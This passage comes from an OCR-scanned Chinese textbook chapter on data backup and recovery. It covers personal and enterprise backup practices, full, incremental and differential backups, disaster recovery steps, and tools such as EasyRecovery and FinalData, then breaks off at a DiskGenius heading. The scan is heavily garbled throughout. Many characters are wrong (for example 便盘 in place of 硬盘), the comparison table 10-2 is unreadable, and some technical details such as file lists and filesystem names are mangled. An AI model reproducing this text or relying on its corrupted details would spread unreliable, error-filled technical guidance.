为 了 减少 由 恶意 代码 导致 的 数据 丢失 带 来 的 损失 ,我 们 在 大 力 发 展 恶 意 代 码 防 范 技术 
的 同时 ,还 要 重视 数据 备份 和 数据 恢复 策略 。 只 要 对 数据 备份 和 数据 恢复 给 予 足够 的 重视 ， 
即使 恶意 代码 破坏 力 青 强 ,其 损失 也 会 在 可 控 范 围 内 。 


10.8.1 数据 备份 


数据 备份 策略 要 决定 何 时 进行 备份 ,备份 哪 种 数据 ,以 及 出 现 故 障 时 进行 恢复 的 方式 。 
根据 工作 环境 的 规模 ,可 以 简单 地 分 为 个 人 PC 备份 策略 和 系统 级 备份 策略 两 类 分 别 进 行 
介绍 。 

1. 个 人 PC 备份 策略 

个 人 PC 备份 策略 可 以 作为 个 人 计算 机 防范 恶意 代码 攻击 的 方法 之 一 。 该 策略 主要 考 
虑 了 一 些 单机 用 户 的 重要 数据 备份 。 这 些 数据 包括 以 下 几 个 方面 。 

1) 备份 个 人 数据 

所 谓 个 人 数据 ,就 是 用 户 个 人 劳动 的 结晶 ,包括 用 户 自 己 经 过 思维 活动 创作 的 各 种 文 
档 编制 的 各 种 源 代码 、 下 载 或 从 其 他 途径 获取 的 有 用 数据 和 程序 等 。“ 一 寸 光 阴 一 寸 金 ”， 
这 些 个 人 数据 包含 了 用 户 的 很 多 心血 。 个 人 数据 的 重要 性 是 毋庸 置疑 的 ,因此 就 要 注意 养 
成 良好 习惯 ,定期 备份 重要 数据 。 

(1) 个 人 数据 集中 存放 。 进 行 硬盘 分 区 时 ,最 好 专门 留 出 一 个 逻辑 分 区 专门 存放 用 户 
的 个 人 数据 。 如 果 没 有 预 留 专门 的 分 区 ,至 少 应 该 专门 生成 一 个 子 目 录 来 存放 个 人 的 重要 
数据 ,包括 用 户 的 文档 、 源 代码 、 重 要 数据 等 均 存储 在 这 里 。 切 忌 因 为 懒惰 而 把 个 人 重要 数 
据 存 放 在 默认 位 置 。 

(2) 经 营 备 份 这 些 数据 。 当 用 户 的 个 人 数据 集中 存放 后 ,还 要 经 常备 份 个 人 数据 。 如 
果 不 按 “ 个 人 数据 集中 存放 ”的 要 求 去 做 ,用 户 会 发 现 备 份 个 人 数据 非常 困难 ,因为 用 户 要 到 
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处 查找 需要 备份 的 文档 、 源 代码 等 重要 数据 。 备 份 个 人 数据 的 途径 有 多 种 ,如 备份 到 USB 
硬盘 、USB 闪存 等 ; 备份 到 文件 服务 器 、FTP 服务 器 等 ; 备份 到 光盘 ,这 需要 刻录 机 支持 ; 
对 于 占用 空间 不 大 的 个 人 数据 ,还 可 以 备份 到 E-mail 服务 器 上 ,这 是 个 非常 方便 的 备份 

2) 备份 系统 重要 数据 

便 盘 的 分 区 表 、 主 引导 区 、 引 导 区 等 重要 区 域 的 数据 ,关系 着 整个 系统 的 安危 。 一 旦 这 
些 数据 遭 到 破坏 ,整个 系统 将 次 痪 ,因此 需要 备份 这 些 数据 ,以 备 不 时 之 用 。 

备份 系统 重要 数据 的 途径 主要 是 依 徘 工 具 , 它 们 包括 : Windows 目 市 的 Dskprobe. 
exe, 该 程序 位 于 Windows 安装 光盘 里 的 \Support\ Tools 目录 下 ; 第 三 方 备份 工具 , 如 
EasyGhost、Dist Genius 等 。 此 外 ,杀毒 软件 也 都 有 备份 系统 重要 数据 的 功能 。 

3) 注册 表 的 备份 

注册 表 是 微软 操作 系统 用 来 保存 硬件 配置 与 软件 设置 的 中 央 数 据 库 , 它 对 系统 及 其 中 
的 软件 的 正常 运行 起 着 至 关 重 要 的 作用 。 由 于 应 用 程序 和 硬件 配置 经 和 党 会 更 改 注 册 表 , 因 
此 注册 表 很 容易 出 错 或 损坏 。 所 以 ,在 注册 表 完 好 时 对 其 备份 是 非常 必要 的 。 虽 然 在 逻辑 
上 注册 表 是 一 个 数据 库 , 但 为 了 管理 和 使 用 的 方便 性 ,操作 系统 把 它 分 为 两 个 文件 : USER. 
DAT 和 SYSTEM. DAT。 注 册 表 备份 的 方法 包括 以 下 内 容 。 

(1) Windows 自动 备份 : USER. DAT 自动 备份 为 USER. DAO,SYSTEM. DAT 自动 
备份 为 SYSTEM. DAO。 

(2) Windows 系统 备份 : 在 C:\WINDOWS\SYSBCKUP 目录 中 以 CAB 文件 格式 备 
份 最 近 5 天 的 系统 文件 。 其 备份 文件 名 分 别 是 rb000. cab、rb001. cab、rb002. cab、rb003. 
cab 和 rb005. cab。 其 中 ,包括 User. dat、System. dat、System. ini 和 Win. ini 等 系统 文件 。 
使 用 Windows 目 市 的 Scanreg. exe 命令 能 够 从 CAB 文件 中 提取 出 相应 的 系统 文件 。 

(3) 手工 备份 : 最 方便 的 方法 就 是 使 用 Regedit 命令 局 动 注册 表 管 理 窗口 ,然后 用 导出 
注册 表 功 能 备份 。 当 然 , 也 可 以 直接 对 注册 表 的 两 个 文件 进行 纯 手工 备份 。 

4) Outlook 数据 的 备份 

Outlook 里 有 大 量 的 邮件 和 联系 人 列表 ,其 中 有 一 些 对 用 户 至 关 重 要 。 如 果 想 完整 的 
备份 Ooutlook 数据 ,用 户 需 要 备份 相应 的 注册 表 表 项 、 备 份 相应 的 数据 文件 等 。 具 体内 容 
包括 以 下 几 方 面 。 

首先 ,备份 注册 表 表 项 。 注 册 表 表 项 “Hkey-current-user\Software\Microsoft\Internet 
AccountManager\Accounts” 中 分 别 有 : 00000001 和 0000000a 等 多 个 子 键 (取决 于 邮箱 与 
新 闻 组 的 多 少 ) ,它们 分 别 代 表 用 户 的 邮箱 与 新 闻 组 。 因 此 ,需要 将 accounts 主键 下 的 各 于 
键 的 注册 表 导 出 并 备份 。 

其 次 , 备份 重要 文件 。 和 备份 Windows 安装 目录 下 的 application data/microsoft/ 
outlook 目录 里 的 所 有 信息 , 如果 用 户 的 Windows 是 多 用 户 设 置 , 则 需 备 份 Windows\ 


最 后 ,备份 通讯 短 。 备 份 通讯 短 的 步骤 是 : 在 通讯 短 中 单 击 " 文 件 ? 沫 单 ,选择 "导出 ? 选 
项 ,然后 选择 "通讯 短 ? 选 项 ,最 后 程序 会 提示 选择 何 种 导出 格式 进行 备份 。 在 没有 特殊 需要 
的 情况 下 ,用 户 可 以 采用 默认 的 格式 进行 备份 。 
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5) Foxmail 数据 的 备份 

Foxmail 是 目前 最 受 欢 迎 的 电子 邮件 客户 端 工 具 软 件 之 一 , 它 的 邮件 备份 比 Outlook 
简单 。Foxmail 软件 会 在 其 安装 目录 下 月 动 建立 一 个 名 为 Mail 的 子 目 录 , 该 子 目 录 里 存放 
有 用 户 收 到 的 邮件 和 发 出 的 邮件 。 用 户 只 需 将 Mail 目录 保存 好 就 可 完成 备份 工作 。 

6) 输入 法 自学 习 数 据 的 备份 

输入 法 的 目 学 习 数 据 的 备份 是 最 易 被 用 户 忽视 的 。 最 重要 的 是 ,大 多 数 用 户 并 不 知道 
为 什么 要 备份 输入 法 信息 ,或 者 备份 输入 法 的 什么 内 容 。 其 实 , 几 乎 所 有 的 输入 法 都 有 目 学 
习 和 目 定 义 功 能 。 经 过 用 户 的 长 期 使 用 后 ,输入 法 的 目 学 习 和 上 月 定义 功能 能 够 提高 用 户 的 
输入 速度 和 准确 度 。 因 此 ,用 户 需 要 备份 输入 法 的 这 些 信息 。 

(1) 备份 五 笔 输入 法 的 目 定 义 词 组 。 五 笔 输入 是 最 具 影 响 的 中 文 输入 法 之 一 。 五 笔 输 
入 法 的 自 定义 词组 保存 在 C:\Windows\System\wbx. emb 文件 中 ,因此 ,用 户 在 删除 或 重 
装 Windows 系统 之 前 , 须 将 wbx. emb 文件 保存 好 。 

(2) 备份 智能 拼音 输入 法 的 自 定义 词组 。 智能 拼音 输入 法 是 最 适合 普通 用 户 使 用 的 输 
入 法 之 一 , 它 除 了 能 日 定义 词组 外 还 能 有 目 动 记忆 用 户 输入 的 词组 。 其 自 定义 词组 保存 在 
C:\WINDOWS\SYSTEM\tmmr. rem 文件 中 ,因此 ,用 户 在 删除 或 重 效 Windows 系统 之 
前 , 须 将 tmmr. rem 文件 保存 好 。 

(3) 备份 微软 拼音 输入 法 的 和 目 定义 词组 。 微 软 拼音 输入 法 在 国内 拥有 庞大 的 用 户 群 ， 
能 输入 繁体 汉字 是 它 最 大 的 特点 。 该 输入 法 也 具有 造 词 功 能 , 它 所 有 的 自 定 义 词组 全 部 保 
存在 pjyyp. upt 文件 中 (路 径 为 C:\Windows\System)。 因 此 ,用 户 在 删除 或 重 装 Windows 
系统 之 前 , 须 备 份 该 文件 。 

7) 浏览 硕 收 藏 夹 的 备份 

浏览 硕 收 藏 夹 内 保存 有 用 户 存 储 的 有 用 的 上 网 地 址 ,这 对 于 经 常 上 网 的 用 户 肯 定 是 很 
重要 的 数据 。 现 在 有 形形色色 的 浏览 器 ,如 IE、FireFox、Mozilla 等 。 在 格式 化 C 盘 或 重 装 
Windows 系统 前 ,一定 要 先 备 份 各 个 浏览 硕 收 藏 夹 中 的 数据 。 备 份 IE 收藏 夹 的 操作 非常 
简单, 即 进 入 C:\Windows\Favorites 文件 夹 ,将 该 文件 夹 中 的 文件 全 部 备份 即 可 。 

2. 系统 级 备份 策略 

随 着 国际 互联 网 和 信息 化 的 发 展 , 企 业 的 服务 需 运 行 着 企业 的 关键 应 用 ,存储 着 重要 的 
数据 和 信息 ,为 决策 部 门 提供 了 多 种 信息 服务 ,为 网 络 环境 下 的 大 量 客户 机 提供 快速 、 高 效 
的 信息 处 理 和 网 络 访问 等 的 重要 服务 。 因 此 ,建立 可 靠 的 系统 级 数据 备份 系统 ,保护 关键 数 
据 的 安全 是 企业 当前 的 重要 任务 之 一 。 系 统 级 备份 可 以 在 发 生 数 据 灾难 时 ,保证 数据 少 丢 
失 或 者 不 丢失 ,最 大 程度 地 减少 企业 的 损失 。 

1) 导致 数据 丢失 的 原因 

IT 网 络 技 术 在 信息 的 收集 ,存储 、 人 处理 ,传输 、 分 发 过 程 中 扮演 看 重要 的 角色 ,提高 了 企 
业 的 日 和 党 工作 效率 。 随 之 也 带 来 了 一 些 新 的 问题 ,其 中 最 值得 关注 的 就 是 系统 错误 乃至 数 
据 丢 失 。 对 数据 的 安全 市 来 威胁 的 原因 有 以 下 几 个 方面 。 

(1) 黑客 攻击 : 黑客 侵入 并 破坏 计算 机 系统 ,导致 数据 丢失 。 

(2) 恶意 代码 : 木马 .病毒 等 恶意 代码 感染 计算 机 系统 ,损坏 数据 。 

(3) 硬盘 损坏 : 电源 浪 涌 .电磁 干扰 都 可 能 损坏 便 盘 ,导致 文件 和 数据 的 丢失 。 

(4) 人 为 错误 : 人 为 删除 文件 或 格式 化 磁盘 。 
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(5) 目 然 灾害 : 火灾 .洪水 或 地 震 等 灾害 毁灭 计算 机 系统 ,导致 数据 丢失 。 

2) 备份 的 策略 

数据 备份 就 是 使 用 成 本 低廉 的 存储 介质 ,定期 将 重要 数据 保存 下 来 ,以 保证 数据 意外 于 
失 时 能 尽快 恢复 ,使 用 户 的 损失 降 到 最 低 。 常 用 的 存储 介质 类 型 有 人 磁盘、 磁带、 光盘 、 网 络 备 
份 等 。 磁 带 经 常用 在 大 容量 的 数据 备份 领域 ,而 网 络 备份 是 当前 最 流行 的 备份 技术 。 建 立 
完整 的 网 络 数据 备份 系统 必须 考虑 以 下 内 容 。 

(1) 数据 备份 的 自动 化 ,减少 系统 管理 员 的 工作 量 。 

(2) 数据 备份 工作 制度 化 、 科 学 化 。 

(3) 介质 管理 的 有 效 化 ,防止 读 写 操作 的 错误 。 

(4) 分 门 别 类 的 介质 存储 ,使 数据 的 保存 更 细致 .科学 。 

(5) 介质 的 清洗 轮转 ,提高 介质 的 安全 性 和 使 用 寿命 。 

(6) 以 备份 服务 需 为 中 心 ,对 各 种 平台 的 应 用 系统 及 其 他 信息 数据 进行 集中 的 备份 。 

(7) 维护 人 员 能 够 容易 地 恢复 损坏 的 文件 系统 和 各 类 数据 。 

3) 备份 管理 软件 

数据 库 是 企业 信息 的 集中 存放 地 , 它 是 数据 备份 的 核心 。 市 场 上 流行 数据 库 管 理 系统 
(如 Oracle、 SQL Server 等 ) 都 带 备 份 工具 ,但 它们 都 不 能 实现 上 月 动 备份 。 也 就 是 说 ,利用 数 
据 库 管理 系统 本 身 的 备份 工具 撑 撑 达 不 到 客户 的 要 求 ,必须 使 用 具有 上 月 动 加 载 功 能 的 磁带 
库 便 件 产 品 与 数据 库 在 线 备 份 功能 的 目 动 备份 软件 。 目 前 ,流行 的 备份 软件 有 多 种 ,如 CA 
ARCserve、 Veritas NetBackup、 HP OpenView Omniback [| \ Legato NetWorker 及 IBM 
ADSM 等 。 各 软件 在 备份 管理 的 方式 上 互 有 优 缺 点 。 它 们 都 具有 日 动 定时 备份 管理 .备份 
介质 自动 管理 ,数据 库 在 线 备份 管理 等 功能 。 其 中 ,CA、Legato 和 Veritas 是 独立 软件 开发 
商 开 发 的 产品 ,更 注重 于 对 多 种 操作 系统 和 数据 库 平 台 的 文 持 ,而 HP 和 IBM 等 更 注重 于 
对 本 公司 软 / 硬 件 产 品 的 文 持 。 

4) 存储 备份 技术 

存储 备份 技术 可 以 确定 需 备份 的 内 容 、 备 份 时 间 及 备份 方式 。 各 个 企业 要 根据 自己 的 
实际 情况 来 选择 不 同 的 备份 技术 。 目 前 被 采用 最 多 的 备份 技术 主要 有 以 下 3 种 。 

(1) 完全 备份 。 完 全 备份 (Full Backup) 是 指 对 整个 系统 或 用 户 指定 的 所 有 文件 进行 一 
次 全 面 的 备份 。 这 是 最 基本 也 是 最 简单 的 备份 方式 ,这 种 备份 方式 的 好 处 就 是 很 直观 ,容易 
被 人 理解 。 如 果 在 备份 间 隅 期 间 出 现 数据 丢失 等 问题 ,可 以 只 使 用 一 份 备 份 文件 快速 地 人 恢 
复 所 丢失 的 数据 。 但 是 它 有 很 明显 的 缺点 : 需要 备份 所 有 的 数据 ,并 且 每 次 备份 的 工作 量 
也 很 大 ,需要 大 量 的 备份 介质 。 如 果 完 全 备份 进行 得 比较 频繁 ,在 备份 设备 中 就 有 大 量 的 数 
据 是 重复 的 。 这 些 重 复 的 数据 占用 了 大 量 空 间 , 这 对 用 户 来 说 就 意味 着 增加 成 本 。 而 且 如 
果 需 要 备份 的 数据 量 相 当 大 ,备份 数据 时 进行 读 写 操 作 所 需 的 时 间 也 会 较 长 。 因 此 这 种 备 
份 不 能 进行 得 太 频 党 ,只 能 每 隔 一 段 较 长 时 间 才 进行 一 次 完整 的 备份 。 但 是 这 样 一 旦 发 生 
数据 丢失 ,只 能 使 用 上 一 次 的 备份 数据 恢复 到 前 次 备份 时 的 数据 状况 ,这 期 间 内 更 新 的 数据 
就 有 可 能 丢失 。 

(2) 增 量 和 备份。 为 了 克服 完全 备份 的 缺点 ,提出 了 增 量 备份 (Incremental Backup) 技 
术 。 增 量 备份 只 备份 上 一 次 备份 操作 以 来 新 创建 或 者 更 新 的 数据 。 因 为 在 特定 的 时 间 段 内 
只 有 少量 的 文件 发 生 改 变 ,没有 重复 的 备份 数据 , 既 节 省 了 空间 ,又 缩短 了 时 间 。 因 而 这 种 
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备份 方法 比较 经 济 , 可 以 频繁 进行 。 典 型 的 增 量 备份 方案 是 在 长 时 间 间 隔 的 完全 备份 之 间 ， 
频繁 地 进行 增 量 备份 。 增 量 备 份 的 缺点 是 : 当 发 生 数 据 丢 失 时 ,恢复 工作 会 比较 麻烦 。 

(3) 差分 备份 。 差 分 备份 (Differential Backup) 即 备份 上 一 次 完全 备份 后 产生 和 更 新 
的 所 有 数据 。 它 的 主要 目的 是 将 完成 恢复 时 涉及 的 备份 记录 数量 限制 在 两 个 ,以 简化 恢复 
的 复杂 性 。 差 分 备份 的 优点 是 : 首先 ,无须 频 繁 地 做 完全 备份 ,工作 量 小 于 完全 备份 ; 其 
次 ,灾难 恢复 相对 简单 。 系 统管 理 员 只 需要 对 两 份 备份 文件 进行 恢复 , 即 完 全 备份 的 文件 和 
灾难 发 生前 最 近 的 一 次 差分 备份 文件 ,就 可 以 将 系统 恢复 。 

增 量 备份 和 差分 备份 都 能 以 比较 经 济 的 方式 对 系统 进行 备份 ,这 两 种 方法 的 备份 方法 
都 是 依赖 于 时 间 ,或 者 是 基于 上 一 次 备份 ( 增 量 ) ,或 者 基于 上 一 次 完全 备份 。 表 10-2 对 3 
种 备份 方案 的 特点 进行 了 比较 。 


表 10-2 备份 方案 的 比较 


室 辣 合用 上 于 完全 各 从 
备份 速记 于 完 全 备 从 
诡 复 速度 居于 于 及 各 从 


在 实际 应 用 中 ,通常 会 结合 上 述 3 种 方案 的 优点 ,混合 使 用 。 例 如 ,每 小 时 进行 一 次 增 
量 备份 或 差分 备份 ,每 天 进行 一 次 完全 备份 。 


10.8.2 数据 恢复 


所 谓 数据 恢复 ,是 指 当 系 统 发 生 改 障 时 ,恢复 到 原 有 状态 的 过 程 。 根 据 有 无 数据 备份 ， 
数据 恢复 可 以 分 为 正常 数据 恢复 和 灾难 数据 恢复 。 正 常数 据 恢复 是 具有 数据 备份 的 数据 恢 
复 ,其 恢复 过 程 非常 傈 单 , 这 里 不 再 讲述 。 下 面 将 重点 介绍 灾难 数据 恢复 。 

在 存储 设备 发 生 故 障 或 遭遇 意外 灾难 造成 数据 丢失 时 ,通过 相应 的 数据 恢复 技术 找 回 
丢失 数据 、 降 低 灾难 损失 的 过 程 称 为 灾难 数据 恢复 。 由 有 恶意 代码 攻击 、 误 分 区 、 误 格式 化 等 
造成 的 数据 丢失 属于 软 损 坏 ,仍然 有 可 能 使 用 第 三 方 软件 来 恢复 。 便 损坏 是 由 于 物理 损失 
造成 的 ,如 盘面 划 伤 .磁头 撞 毁 . 忆 片 及 其 他 元 天 件 烧 坏 等 造成 的 损失 。 便 损坏 需要 在 专业 
人 员 的 指导 下 修复 。 

在 当今 这 样 一 个 信息 化 和 网 络 化 的 社会 里 ,计算 机 正在 人 们 的 工作 和 生活 中 扮演 着 日 
益 重 要 的 角色 。 越 来 越 多 的 企业 商家 政府 机 关 和 个 人 通过 计算 机 来 处 理 信 息 , 同 时 将 各 
种 信息 以 数据 文件 的 形式 保存 在 计算 机 中 。 一 旦 重要 的 数据 丢失 ,将 会 带 来 严重 的 后 果 。 

在 大 多 数 情况 下 ,用户 找 不 到 的 数据 往往 并 没有 真正 丢失 ,只 要 处 理 得 当 , 恢 复 是 完全 
有 可 能 的 。 即 使 数据 被 删 除 或 硬盘 出 现 故 障 , 只 要 在 介质 没有 严重 受 损 的 情况 下 ,数据 就 有 
可 能 被 完好 无 损 地 恢复 。 在 格式 化 或 误 删 除 引 起 的 数据 损失 的 情况 下 ,大 部 分 数据 仍 未 损 
坏 , 用 软件 重新 恢复 后 ,可 以 重读 数据 。 如 果 人 硬盘 因 硬 件 损 坏 而 无 法 访问 ,更 换 发 生 故 障 的 
零件 , 即 可 恢复 数据 。 在 介质 严重 受 损 或 数据 和 被覆 益 情况 下 ,数据 将 无 法 恢复 。 

1. 数据 可 恢复 的 前 提 

实践 证 明 , 并 不 是 一 切 丢 失 的 数据 部 可 以 恢复 过 来 ,否则 ,就 不 能 称 为 数据 灾难 了 。 如 
果 被 删除 的 文件 所 在 的 物理 位 置 (存储 空间 ) 已 经 被 其 他 文件 取代 ,或 者 文件 数据 占用 的 磁 
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盘 空间 已 经 分 配给 其 他 文件 且 已 经 被 填充 数据 ,那么 该 文件 就 不 可 能 再 复原 了 了。 电子 碎 纸 
机 就 是 利用 这 种 原理 来 设计 的 。 当 然 , 对 于 便 损 坏 而 言 , 如 果 人 硬件 或 存储 介质 损坏 得 非常 严 
重 ,并 且 没 有 宛 余 信息 存在 ,也 是 不 可 能 恢复 的 。 

2. 出 现 数据 灾难 时 如 何 处 理 

一 且 出 现 了 数据 灾难 事件 ,用 户 也 不 用 太 担 心 , 只 要 采用 适当 的 处 理 方式 ,灾难 数据 基 
本 能 够 复原 。 根 据 调查 显示 ,数据 损坏 大 多 是 可 以 部 分 或 全 部 恢复 的 ,在 不 能 恢复 实际 案例 
中 ,90% 以 上 是 由 于 用 户 使 用 了 错误 的 恢复 工具 或 恢复 方法 所 造成 的 。 

如 果 是 由 恶意 代码 攻击 \ 误 分 区 \ 误 格式 化 等 原因 造成 的 数据 丢失 ,这 将 关系 到 整个 便 
盘 数 据 的 存亡 。 在 发 生 便 盘 数 据 丢 失事 件 后 ,首先 应 该 立即 关机 , 拔 下 便 盘 ,不 要 再 对 人 硬盘 
进行 写 操作 ,避免 数据 进一步 丢失 是 当务之急 。 最 好 用 Ghost 的 TrackBYTrack 方式 对 便 
盘 做 一 个 备份 ,用 备份 盘 符 试 各 种 数据 恢复 。 所 有 对 硬盘 的 修复 操作 都 应 该 是 可 逆 的 或 者 
只 读 的 ,不 能 盲目 地 日 行 采 用 第 三 方 工具 进行 修复 操作 ,以 免 造 成 无 法 挽回 的 损失 。 然 后 ， 
尽快 找 专业 人 员 进 行 咨询 并 采用 合适 的 方式 处 理 。 

3. 低 难 度数 据 恢 复 

有 些 故障 是 非 凋 简单 的 ,对 于 精通 计算 机 的 用 户 来 说 ,完全 可 以 月 已 设法 处 理 。 低 难度 
的 可 恢复 故障 包括 以 下 几 种 。 

(1) 便 盘 故障 嫌疑 。 首 先 检 查 信 号 线 和 电源 线 是 否 搬 好 ,如 果 故 障 仍 不 能 恢复 , 则 需要 
将 硬盘 挂 到 另 一 台 正 篆 计 算 机 上 进行 测试 。 在 另 一 台 计 算 机 上 用 BIOS 的 便 盘 检测 功能 进 
行 检 测 ,如 果 还 是 无 法 检测 到 该 硬盘 ,就 肯定 是 人 硬件 故障 。 

(2) 分 区 损坏 嫌疑 。 用户 可 以 用 Windows 操作 系统 自 带 的 FDISK 等 工具 进行 检测 ， 
如 果 无 任何 分 区 信息 显示 , 则 说 明 磁 盘 分 区 已 被 破坏 。 

(3) 便 盘 电路 板 故 障 嫌 疑 。 可 以 找 一 块 型 号 完全 相同 的 好 人 硬盘 ,并 更 换 其 电路 板 进 行 
测试 。 如 果 成 功 则 说 明 无 故障 ; 否则 ,说 明 有 故障 。 

(4) 误 格 式 化 \ 误 删除 故障 。 将 该 便 盘 连接 到 男 一 台 正 常 的 计算 机 上 作为 辅助 硬盘 , 然 
后 采用 EasyRecovery 等 第 三 方 数据 恢复 工具 进行 故障 修复 。 

如 果 上 述 方法 不 能 诊断 或 修复 这 些 故 障 , 则 说 明 损 坏 情况 比较 严重 ,不 能 青 由 非 专 业 人 
员 人 处理, 应 该 尽快 送 给 专业 人 员 处 理 。 

4. 高 难度 数据 恢复 

高 难度 的 数据 恢复 需要 专业 人 员 来 处 置 。 第 见 的 高 难度 数据 恢复 情况 有 如 下 几 种 。 

(1) 硬盘 分 区 表 损 坏 。 便 盘 分 区 表 被 破坏 的 情况 ,是 数据 损坏 中 除 物理 损坏 之 外 最 严 
重 的 一 种 灾难 性 破坏 。 导 致 便 盘 分 区 表 损 坏 的 原因 主要 包括 : 内 误 操作 删除 分 区 ,这 种 情 
况 下 ,只 要 没有 进行 其 他 额外 的 操作 完全 可 以 恢复 ; 四 安 闻 多 系统 引导 软件 或 者 采用 第 三 
方 分 区 工具 导致 分 区 混乱 ,这 种 情况 具有 恢复 的 可 能 性 ; 恶意 代码 攻击 破坏 分 区 ,这 种 原 
因 也 可 以 部 分 或 者 全 部 恢复 ; 由 Ghost 工具 破坏 分 区 ,这 种 一 般 可 以 部 分 恢复 。 

(2) 人 硬盘 坏 朵 区 。 硬 盘 用 久 了 ,出 现 " 坏 道 ? 是 最 常见 的 故障 。 人 硬盘 坏 道 一 般 分 为 逻辑 
坏 站 和 物理 坏 关 。 逻 辑 坏 关 是 由 软件 操作 或 使 用 不 当 造 成 的 ,可 以 用 软件 进行 修复 。 物 理 
坏 道 是 真正 的 物理 性 坏 道 , 它 是 由 于 便 盘 磁 道上 产生 的 物理 损伤 造成 的 。 物 理 坏 道 只 能 通 
过 修改 人 硬盘 分 区 或 肌 区 的 使 用 情况 来 解决 。 便 盘 有 坏 道 特征 如 下 。 
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OO 在 操作 某 个 文件 时 , 便 盘 出 现 操作 速度 变 慢 、 长 时 间 操 作 不 成 功 、 长 时 间 读 某 一 区 
域 人 硬盘 异 啊 等 现象 ,以 及 操作 系统 提示 “无 法 读 取 或 写 入 某 个 文件 ”等 信息 ,这 些 都 表明 便 
盘 可 能 出 现 了 坏 道 。 

@@ Scandisk 程序 在 开机 时 自动 运行 。 这 种 现象 说 明 硬 盘 上 有 需要 修复 的 重要 错误 (如 
坏 道 灯 )。 该 程序 如 果 不 能 成 功 检 测 人 硬盘 , 则 便 盘 肯定 有 坏 道 。 

G) 硬盘 无 法 启动 。 用 其 他 途径 启动 后 ,看 不 到 硬盘 盘 符 ,或 者 盘 符 可 见 但 无 法 对 该 区 
进行 操作 ,这 些 现象 都 表明 硬盘 上 可 能 出 现 了 坏 道 。 

(3) 磁头 损坏 。 硬 盘 发 展 的 趋势 是 越 来 越 多 的 数据 被 储存 在 越 来 越 小 的 空间 里 。 
20 年 前 ,硬盘 只 能 储存 MB 级 的 数据 ,而 现在 的 硬盘 可 以 在 比 20 年 前 更 小 的 空间 上 存储 
TB 级 的 数据 。 硬 盘 储存 数据 量 的 扩大 增加 了 数据 损失 的 概率 。 当 更 多 的 数据 存 进 更 小 、 
更 紧密 的 空间 时 ,机械 的 精密 度 就 变 得 非常 重要 。 一 个 轻 轻 的 推动 ,电压 激增 都 可 能 使 磁头 
碰撞 到 盘 片 ,从 而 造成 磁头 和 盘 片 的 损坏 。 一 般 情 况 下 , 盘 片上 被 磁头 碰 到 的 地 方 ,数据 会 
永久 丢失 。 

(4) 盘 片 损伤 。1968 年 ,IBM 提出 了 Winchester( 温 盘 ) 技 术 , 这 是 现代 绝 大 多 数 人 硬盘 
的 原型 。 温 盘 使 用 密封 .固定 并 高 速 旋 转 的 镀 磁 盘 片 ,磁头 沿 盘 片 径 回 移动 并 且 悬 浮 在 高 速 
转动 的 盘 片上 方 , 但 不 与 盘 片 直接 接触 。1973 年 ,IBM 制造 出 了 第 一 块 采 用 温 盘 技术 的 
人 硬盘。 

早期 的 盘 片 都 是 使 用 塑料 材料 作为 盘 片 基质 ,然后 再 在 塑料 基质 上 涂 上 磁性 材料 构成 。 
市 场 上 的 IDE 人 硬盘 几乎 都 是 使 用 铝 质 基质 ,而 采用 玻璃 材料 作为 盘 片 基质 则 是 较 新 的 硬盘 
盘 片 技术 。 玻 璃 材料 能 使 硬盘 具有 平滑 性 及 更 高 的 坚固 性 ,以 及 更 高 的 稳定 性 。 大 部 分 影 
啊 便 盘 的 精度 是 1 一 2 微 寸 ( 灰 侍 是 4 一 8 微 寸 ,人 类 的 头发 是 10 微 寸 )。 对 如 此 精密 的 盘 片 
而 言 ,任何 微小 的 动作 都 可 能 造成 无 可 挽回 的 损伤 。 


10.8.3 数据 恢复 工具 


目前 ,市 场 上 已 经 有 很 多 非常 成 功 的 数据 恢复 工具 ,并 在 实际 工作 中 给 用 户 市 来 了 便 
利 。 但 如 末 使 用 不 当 , 数 据 修复 工具 也 有 可 能 会 破坏 用 户 数 据 。 所 以 在 使 用 这 些 工具 之 前 ， 
最 好 先 认 真 学 习 或 咨询 专业 公司 。 下 面 介 绍 几 球 和 常见 的 数据 恢复 工具 。 


1. EasyRecovery 


EasyRecovery 是 由 美国 数据 厂商 Kroll Ontrack 出 品 的 一 款 数据 文件 恢复 软件 。 它 
可 以 恢复 各 种 存储 介质 的 数据 ,包括 便 盘 、 光 盘 、U 盘 / 移 动人 硬盘 、 数 码 相机 、 手 机 、RAID 系 
统 等 。 除 Windows 系统 外 , 它 还 支持 使 用 FAT、NTFS、HFS、EXTISO9660 分 区 的 文件 系 
统 的 Mac 数据 恢复 ,可 以 恢复 Mac 下 丢失 、 误 删 的 文件 。EasyRecovery 文 持 几乎 所 有 文件 
类 型 的 数据 恢复 ,包括 图 像 、 视 频 、 音 频 、 应 用 程序 、 办 公文 档 文本 文档 及 定制 。 能 够 识别 多 
达 259 种 文件 扩展 名 ,还 可 设 定 文 件 的 过 滤 规 则 ,快速 恢复 数据 。 

EasyRecovery 除 免 费 版 外 ,还 有 个 人 版 (EasyRecovery Home) 专业 版 (EasyRecovery 
Professional) 企业 版 (EasyRecovery Technician) 等 多 种 版 本 。 


OD https://www. krollontrack. com/products/data-recovery-software/ 。 
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2. FinalData 


FinalData9 是 由 美国 FinalData 公司 推出 的 数据 恢复 软件 。 该 软件 具有 功能 强大 、 操 
作 人 简单 ,快速 高 效 和 覆盖面 广 等 鲜明 特点 ,可 以 为 数据 文件 提供 强 有 力 的 安全 保障 。 

因为 FinalData 可 以 通过 扫描 整个 磁盘 来 进行 文件 查找 和 恢复 , 它 不 依赖 目录 入 口 和 
FAT 表 记录 的 信息 ,所 以 它 既 可 以 恢复 被 删除 的 文件 ,还 可 以 在 整个 目录 入 口 和 FAT 表 都 
遭 到 破坏 的 情况 下 进行 数据 恢复 ,甚至 在 磁盘 引导 区 被 破坏 、 分 区 全 部 信息 丢失 (如 硬盘 被 
重新 分 区 或 者 格式 化 ) 的 情况 下 进行 数据 恢复 。 大 家 知道 ,病毒 和 黑客 通常 是 选择 磁盘 引导 
区 分 区 信息 和 目录 入 口 .FAT 等 进行 攻击 的 ,因为 这 样 只 需 破 坏 掉 少量 的 关键 信息 就 可 以 
造成 大 量 的 数据 文件 其 至 使 整个 磁盘 都 变 得 不 可 用 ,同时 错误 的 重新 分 区 和 格式 化 则 是 危 
害 最 大 的 误 操 作 , 但 是 通过 FinalData 的 强大 恢复 功能 ,就 能 够 帮助 用 户 从 数据 灾难 中 轻松 
摆脱 出 来 。 

目前 ,FinalData 提供 标准 版 ,企业 版 和 企业 网 络 版 3 个 版 本 。 

3. DiskGenius 


